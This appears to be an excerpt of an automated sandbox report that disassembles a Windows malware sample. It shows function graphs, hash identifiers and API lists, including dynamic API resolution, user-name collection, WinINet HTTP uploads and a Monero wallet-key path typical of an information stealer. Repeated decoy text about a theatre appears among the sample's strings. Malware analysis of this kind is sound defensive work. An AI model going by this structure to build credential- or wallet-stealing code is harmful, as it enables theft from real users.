                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0054471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00544643
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: 3f09200a3ee34a8e79988b174ca283ea1fd86a99e7da6ac550120746403fcb0b
                      • Instruction ID: 85490bd7d5d68210543cab87745683d32569966229efbadf2b13beb311b5ad3c
                      • Opcode Fuzzy Hash: 3f09200a3ee34a8e79988b174ca283ea1fd86a99e7da6ac550120746403fcb0b
                      • Instruction Fuzzy Hash: 5C4108717CA70C7AE666BFA48842E9D7F66FF4270CF919640EA4953380DBB07520853A
                      Function 00544880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 801 544880-544942 call 55a7a0 call 5447b0 call 55a740 * 5 InternetOpenA StrCmpCA 816 544944 801->816 817 54494b-54494f 801->817 816->817 818 544955-544acd call 558b60 call 55a920 call 55a8a0 call 55a800 * 2 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a920 call 55a8a0 call 55a800 * 2 InternetConnectA 817->818 819 544ecb-544ef3 InternetCloseHandle call 55aad0 call 549ac0 817->819 818->819 905 544ad3-544ad7 818->905 829 544ef5-544f2d call 55a820 call 55a9b0 call 55a8a0 call 55a800 819->829 830 544f32-544fa2 call 558990 * 2 call 55a7a0 call 55a800 * 8 819->830 829->830 906 544ae5 905->906 907 544ad9-544ae3 905->907 908 544aef-544b22 HttpOpenRequestA 906->908 907->908 909 544ebe-544ec5 InternetCloseHandle 908->909 910 544b28-544e28 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a9b0 call 55a8a0 call 55a800 call 55a920 call 55a8a0 call 55a800 call 55a740 call 55a920 * 2 call 55a8a0 call 55a800 * 2 call 55aad0 lstrlen call 55aad0 * 2 lstrlen call 55aad0 HttpSendRequestA 908->910 909->819 1021 544e32-544e5c InternetReadFile 910->1021 1022 544e67-544eb9 InternetCloseHandle call 55a800 1021->1022 1023 544e5e-544e65 1021->1023 1022->909 1023->1022 1024 544e69-544ea7 call 55a9b0 call 55a8a0 call 55a800 1023->1024 1024->1021
                      APIs
                        • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                        • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                        • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                        • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00544915
                      • StrCmpCA.SHLWAPI(?,0102FC80), ref: 0054493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00544ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00560DDB,00000000,?,?,00000000,?,",00000000,?,0102FD20), ref: 00544DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00544E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00544E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00544E49
                      • InternetCloseHandle.WININET(00000000), ref: 00544EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00544EC5
                      • HttpOpenRequestA.WININET(00000000,0102FC40,?,0102F320,00000000,00000000,00400100,00000000), ref: 00544B15
                        • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01028C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                        • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                        • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                        • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                        • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                        • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                      • InternetCloseHandle.WININET(00000000), ref: 00544ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                      • Instruction ID: 11bfdefe5bde5ff7d9ebae7526ccd04d132c2cd9998d10409d069d06a633ba0d
                      • Opcode Fuzzy Hash: 76d4342f6211b18752b50b7f1c5d415cab95fde370bf9f711a7bec7185ee0b97
                      • Instruction Fuzzy Hash: 83120F72910119AADB15EB90DC66FEEBB38BF94301F50429AB50663091EF702F4DCF66
                      Function 00557850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                      • Instruction ID: 2c4d2b98053619506c1266ad9c209b0f1d8a9943a6f3c67b784837e2a1d16652
                      • Opcode Fuzzy Hash: d4bb8fca113f90ce062dd9405b857bb141b1039c1f5e13a0eeb606f1434eb7c5
                      • Instruction Fuzzy Hash: 0BF04FB2944208ABDB10DF98DD49BAEBBB8FB08721F10465AFA05A2680C77815048BA1
                      Function 00541160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                      • Associated: 00000000.00000002.2174024121.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174035967.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174161624.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174469169.0000000000A46000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174635695.0000000000BE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2174652014.0000000000BE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_540000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                      • Instruction ID: 866bd86557b26f156826fc20dd0e5d3d36d6d3039ae17df4f0d0e268f7677cd0
                      • Opcode Fuzzy Hash: 31d03117b2dd062b03e29f2b2052961c476beeff6c710425227f5370a305d842
                      • Instruction Fuzzy Hash: 02D05E7494030CEBDB00DFE0D8496DDBB78FB08315F101555D90562340EA345481CBAA
                      Function 00559C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 559c10-559c1a 634 55a036-55a0ca LoadLibraryA * 8 633->634 635 559c20-55a031 GetProcAddress * 43 633->635 636 55a146-55a14d 634->636 637 55a0cc-55a141 GetProcAddress * 5 634->637 635->634 638 55a216-55a21d 636->638 639 55a153-55a211 GetProcAddress * 8 636->639 637->636 640 55a21f-55a293 GetProcAddress * 5 638->640 641 55a298-55a29f 638->641 639->638 640->641 642 55a2a5-55a332 GetProcAddress * 6 641->642 643 55a337-55a33e 641->643 642->643 644 55a344-55a41a GetProcAddress * 9 643->644 645 55a41f-55a426 643->645 644->645 646 55a4a2-55a4a9 645->646 647 55a428-55a49d GetProcAddress * 5 645->647 648 55a4dc-55a4e3 646->648 649 55a4ab-55a4d7 GetProcAddress * 2 646->649 647->646 650 55a515-55a51c 648->650 651 55a4e5-55a510 GetProcAddress * 2 648->651 649->648 652 55a612-55a619 650->652 653 55a522-55a60d GetProcAddress * 10 650->653 651->650 654 55a67d-55a684 652->654 655 55a61b-55a678 GetProcAddress * 4 652->655 653->652 656 55a686-55a699 GetProcAddress 654->656 657 55a69e-55a6a5 654->657 655->654 656->657 658 55a6a7-55a703 GetProcAddress * 4 657->658 659 55a708-55a709 657->659 658->659
                      APIs
                      • GetProcAddress.KERNEL32(76210000,01015408), ref: 00559C2D
                      • GetProcAddress.KERNEL32(76210000,01015528), ref: 00559C45
                      • GetProcAddress.KERNEL32(76210000,01028FE0), ref: 00559C5E
                      • GetProcAddress.KERNEL32(76210000,01028FF8), ref: 00559C76
                      • GetProcAddress.KERNEL32(76210000,01029010), ref: 00559C8E
                      • GetProcAddress.KERNEL32(76210000,0102DF28), ref: 00559CA7
                      • GetProcAddress.KERNEL32(76210000,0101A5B8), ref: 00559CBF
                      • GetProcAddress.KERNEL32(76210000,0102DE08), ref: 00559CD7
                      • GetProcAddress.KERNEL32(76210000,0102DEF8), ref: 00559CF0
                      • GetProcAddress.KERNEL32(76210000,0102DDF0), ref: 00559D08
                      • GetProcAddress.KERNEL32(76210000,0102DE38), ref: 00559D20
                      • GetProcAddress.KERNEL32(76210000,010156A8), ref: 00559D39
                      • GetProcAddress.KERNEL32(76210000,01015568), ref: 00559D51
                      • GetProcAddress.KERNEL32(76210000,010155A8), ref: 00559D69
                      • GetProcAddress.KERNEL32(76210000,010155C8), ref: 00559D82
                      • GetProcAddress.KERNEL32(76210000,0102DE20), ref: 00559D9A
                      • GetProcAddress.KERNEL32(76210000,0102DE50), ref: 00559DB2
                      • GetProcAddress.KERNEL32(76210000,0101A658), ref: 00559DCB
                      • GetProcAddress.KERNEL32(76210000,01015668), ref: 00559DE3
                      • GetProcAddress.KERNEL32(76210000,0102DE68), ref: 00559DFB
                      • GetProcAddress.KERNEL32(76210000,0102DF40), ref: 00559E14
                      • GetProcAddress.KERNEL32(76210000,0102DE80), ref: 00559E2C
                      • GetProcAddress.KERNEL32(76210000,0102DF10), ref: 00559E44
                      • GetProcAddress.KERNEL32(76210000,01015588), ref: 00559E5D
                      • GetProcAddress.KERNEL32(76210000,0102DE98), ref: 00559E75
                      • GetProcAddress.KERNEL32(76210000,0102DDD8), ref: 00559E8D
                      • GetProcAddress.KERNEL32(76210000,0102DDC0), ref: 00559EA6
                      • GetProcAddress.KERNEL32(76210000,0102DEB0), ref: 00559EBE
                      • GetProcAddress.KERNEL32(76210000,0102DEC8), ref: 00559ED6
                      • GetProcAddress.KERNEL32(76210000,0102DF58), ref: 00559EEF
                      • GetProcAddress.KERNEL32(76210000,0102DEE0), ref: 00559F07
                      • GetProcAddress.KERNEL32(76210000,0102DF70), ref: 00559F1F
                      • GetProcAddress.KERNEL32(76210000,0102D9D0), ref: 00559F38
                      • GetProcAddress.KERNEL32(76210000,0101F7D8), ref: 00559F50
                      • GetProcAddress.KERNEL32(76210000,0102DA00), ref: 00559F68
                      • GetProcAddress.KERNEL32(76210000,0102D9A0), ref: 00559F81
                      • GetProcAddress.KERNEL32(76210000,010153C8), ref: 00559F99
                      • GetProcAddress.KERNEL32(76210000,0102D7F0), ref: 00559FB1
                      • GetProcAddress.KERNEL32(76210000,01015608), ref: 00559FCA
                      • GetProcAddress.KERNEL32(76210000,0102D958), ref: 00559FE2
                      • GetProcAddress.KERNEL32(76210000,0102D9B8), ref: 00559FFA
                      • GetProcAddress.KERNEL32(76210000,01015628), ref: 0055A013
                      • GetProcAddress.KERNEL32(76210000,01015648), ref: 0055A02B
                      • LoadLibraryA.KERNEL32(0102D7C0,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A03D
                      • LoadLibraryA.KERNEL32(0102D9E8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A04E
                      • LoadLibraryA.KERNEL32(0102D928,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A060
                      • LoadLibraryA.KERNEL32(0102D7D8,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A072
                      • LoadLibraryA.KERNEL32(0102D988,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A083
                      • LoadLibraryA.KERNEL32(0102D808,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A095
                      • LoadLibraryA.KERNEL32(0102DA18,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0A7
                      • LoadLibraryA.KERNEL32(0102D820,?,00555CA3,00560AEB,?,?,?,?,?,?,?,?,?,?,00560AEA,00560AE3), ref: 0055A0B8
                      • GetProcAddress.KERNEL32(751E0000,010152E8), ref: 0055A0DA
                      • GetProcAddress.KERNEL32(751E0000,0102DA60), ref: 0055A0F2
                      • GetProcAddress.KERNEL32(751E0000,010289D8), ref: 0055A10A
                      • GetProcAddress.KERNEL32(751E0000,0102DA30), ref: 0055A123
                      • GetProcAddress.KERNEL32(751E0000,01015328), ref: 0055A13B
                      • GetProcAddress.KERNEL32(70250000,0101A7E8), ref: 0055A160
                      • GetProcAddress.KERNEL32(70250000,01014F68), ref: 0055A179
                      • GetProcAddress.KERNEL32(70250000,0101A680), ref: 0055A191
                      • GetProcAddress.KERNEL32(70250000,0102D970), ref: 0055A1A9
                      • GetProcAddress.KERNEL32(70250000,0102D850), ref: 0055A1C2
                      • GetProcAddress.KERNEL32(70250000,01014FA8), ref: 0055A1DA
                      • GetProcAddress.KERNEL32(70250000,01014FE8), ref: 0055A1F2
                      • GetProcAddress.KERNEL32(70250000,0102D838), ref: 0055A20B
                      • GetProcAddress.KERNEL32(753A0000,010150E8), ref: 0055A22C
                      • GetProcAddress.KERNEL32(753A0000,01015308), ref: 0055A244
                      • GetProcAddress.KERNEL32(753A0000,0102D8F8), ref: 0055A25D
                      • GetProcAddress.KERNEL32(753A0000,0102DA48), ref: 0055A275
                      • GetProcAddress.KERNEL32(753A0000,01015208), ref: 0055A28D
                      • GetProcAddress.KERNEL32(76310000,0101A6D0), ref: 0055A2B3
                      • GetProcAddress.KERNEL32(76310000,0101A478), ref: 0055A2CB
                      • GetProcAddress.KERNEL32(76310000,0102DA78), ref: 0055A2E3
                      • GetProcAddress.KERNEL32(76310000,01015048), ref: 0055A2FC
                      • GetProcAddress.KERNEL32(76310000,01014F48), ref: 0055A314
                      • GetProcAddress.KERNEL32(76310000,0101A568), ref: 0055A32C
                      • GetProcAddress.KERNEL32(76910000,0102D880), ref: 0055A352
                      • GetProcAddress.KERNEL32(76910000,010150A8), ref: 0055A36A
                      • GetProcAddress.KERNEL32(76910000,01028A48), ref: 0055A382
                      • GetProcAddress.KERNEL32(76910000,0102DA90), ref: 0055A39B
                      • GetProcAddress.KERNEL32(76910000,0102D898), ref: 0055A3B3
                      • GetProcAddress.KERNEL32(76910000,01015288), ref: 0055A3CB
                      • GetProcAddress.KERNEL32(76910000,01015188), ref: 0055A3E4
                      • GetProcAddress.KERNEL32(76910000,0102DAA8), ref: 0055A3FC
                      • GetProcAddress.KERNEL32(76910000,0102D8B0), ref: 0055A414
                      • GetProcAddress.KERNEL32(75B30000,010152A8), ref: 0055A436
                      • GetProcAddress.KERNEL32(75B30000,0102D8C8), ref: 0055A44E
                      • GetProcAddress.KERNEL32(75B30000,0102D868), ref: 0055A466
                      • GetProcAddress.KERNEL32(75B30000,0102D8E0), ref: 0055A47F
                      • GetProcAddress.KERNEL32(75B30000,0102D910), ref: 0055A497
                      • GetProcAddress.KERNEL32(75670000,010151A8), ref: 0055A4B8
                      • GetProcAddress.KERNEL32(75670000,010152C8), ref: 0055A4D1
                      • GetProcAddress.KERNEL32(76AC0000,01014FC8), ref: 0055A4F2
                      • GetProcAddress.KERNEL32(76AC0000,0102D940), ref: 0055A50A
                      • GetProcAddress.KERNEL32(6F4E0000,01015088), ref: 0055A530
                      • GetProcAddress.KERNEL32(6F4E0000,01015228), ref: 0055A548
                      • GetProcAddress.KERNEL32(6F4E0000,01014F88), ref: 0055A560
                      • GetProcAddress.KERNEL32(6F4E0000,0102DD00), ref: 0055A579
                      • GetProcAddress.KERNEL32(6F4E0000,01015168), ref: 0055A591
                      • GetProcAddress.KERNEL32(6F4E0000,010151C8), ref: 0055A5A9
                      • GetProcAddress.KERNEL32(6F4E0000,010151E8), ref: 0055A5C2
                      • GetProcAddress.KERNEL32(6F4E0000,01015008), ref: 0055A5DA
                      • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0055A5F1
                      • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0055A607
                      • GetProcAddress.KERNEL32(75AE0000,0102DD78), ref: 0055A629
                      • GetProcAddress.KERNEL32(75AE0000,01028A98), ref: 0055A641
                      • GetProcAddress.KERNEL32(75AE0000,0102DCA0), ref: 0055A659
                      • GetProcAddress.KERNEL32(75AE0000,0102DC10), ref: 0055A672
                      • GetProcAddress.KERNEL32(76300000,01015028), ref: 0055A693
                      • GetProcAddress.KERNEL32(6E9F0000,0102DC28), ref: 0055A6B4
                      • GetProcAddress.KERNEL32(6E9F0000,01015248), ref: 0055A6CD
                      • GetProcAddress.KERNEL32(6E9F0000,0102DC40), ref: 0055A6E5
                      • GetProcAddress.KERNEL32(6E9F0000,0102DB98), ref: 0055A6FD
                      Strings
                      Memory Dump Source
